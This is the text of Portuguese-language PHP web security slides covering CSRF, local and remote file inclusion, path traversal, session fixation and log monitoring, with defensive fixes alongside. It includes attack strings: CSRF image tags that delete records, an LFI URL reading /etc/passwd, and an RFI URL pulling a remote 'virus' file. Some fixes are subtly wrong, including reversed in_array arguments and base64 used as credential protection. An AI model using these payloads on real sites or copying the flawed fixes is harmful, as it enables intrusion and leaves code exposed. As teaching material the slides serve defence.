  • 34. config.php - shoulder surfing (espiada nos ombros) define(‘LOGIN’,’fsd324A…==’); define(‘SENHA’,’ghgh24A…==’); $login=base64_decode(LOGIN); $login=base64_decode(SENHA);
  • 35. CSRF POR GET OU POST <img src=’site.com/admin/del.php?id=123’> <img src=’site.com/admin/del.php?id=124’> <img src=’site.com/admin/del.php?id=125’> ou entao para quem usa MD5/SHA1 (sem salt) for($i=1;$i<=10000;$i++) echo “<img src=’site.com/admin/del.php?id=’.md5($i).”>” Funcionários logados no sistema através do controle por $_SESSION
  • 36. CSRF if($_POST){ if($_SESSION[‘token’] != $_POST[‘token’]){ echo “erro csrf”;exit; } addCliente($_POST); } $_SESSION[‘token’] = random_bytes(64); <input type=”hidden” name=”token” value=”<?=$_SESSION[‘token’]?>”>
  • 37. LFI - Local File Inclusion www.site.com/index.php?idioma=br $idioma = $_GET[‘idioma’]; require “../lang/$idioma.php”; www.site.com/index.php?idioma=../../etc/passwd0 Solução $idiomas = [‘en’,’br’,’es’]; if(in_array($idiomas,$idioma)) require “../lang/$idioma.php”;
  • 38. RFI - Remote File Inclusion $incfile = $_REQUEST["file"]; include($incfile.".php"); www.site.com/index.php?file=http://192.23.44.55/virus
  • 40. Pasta Pública e Raiz Path traversal - ../../../arquivo.php (Apache ou .htaccess Options -Indexes) www.site.com/
  • 41. Cookies e Sessions Usar cookies em HTTPS - Certificado ssl grátis - https://letsencrypt.org/ Cuidado com fixação de sessão site.com.br/logado.php?PHPSESSIONID=553534h5h34g5g345hg3 ● Use o parâmetro HTTPOnly para que javascript não acesse o arquivo txt do cookie ● setcookie("nome","valor","","", true); ● Use a função session_regenerate_id() após login/logout de seus usuários #PREVENTING SESSION HIJACKING #Prevents javascript XSS attacks aimed to steal the session ID ini_set('session.cookie_httponly', 1); #PREVENTING SESSION FIXATION #Session ID cannot be passed through URLs ini_set('session.use_only_cookies', 1); #Uses a secure connection (HTTPS) if possible ini_set('session.cookie_secure', 1);
  • 42. Arquivos de log Que tal fazer um script que monitora 24x7 seus logs e em se tratando de algo suspeito envia um telegram para o responsável ou bloqueia no exato momento da tentativa de invasão com iptables /var/log/apache2/access.log /var/log/apache2/error.log /var/log/mysql/error.log
  • 43. chmod +x /var/www/meubot.php crontab -e * * */1 * * /usr/bin/php -q /var/www/meubot.php >/dev/null 2>&1
  • 44.
  • 45.